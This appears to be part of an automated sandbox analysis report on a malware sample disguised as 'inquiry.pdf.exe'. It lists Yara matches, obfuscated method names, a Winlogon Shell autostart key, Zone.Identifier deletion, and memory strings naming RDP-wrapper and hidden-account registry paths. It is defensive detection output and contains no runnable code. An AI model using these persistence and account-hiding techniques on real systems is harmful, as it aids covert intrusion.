            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124D18F push dword ptr [ebp+ecx-75h]; retf 18_2_0124D19A
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124D238 push dword ptr [ebp+ebx-75h]; iretd 18_2_0124D205
            Source: jhFFFffkl.exe.18.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
            Source: inquiry.pdf.exe, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: 0.0.inquiry.pdf.exe.a90000.0.unpack, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: glonkjhg.exe.13.dr, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.csHigh entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.csHigh entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.csHigh entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.csHigh entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\glonkjhg.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeJump to dropped file

            Boot Survival

            barindex
            Creates an undocumented autostart registry key
            Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Contains functionality to hide user accounts
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile opened: C:\Users\user\Desktop\inquiry.pdf.exe\:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile opened: C:\Users\user\AppData\Roaming\glonkjhg.exe\:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe:Zone.Identifier read attributes | deleteJump to behavior
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: pdf.exeStatic PE information: inquiry.pdf.exe
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
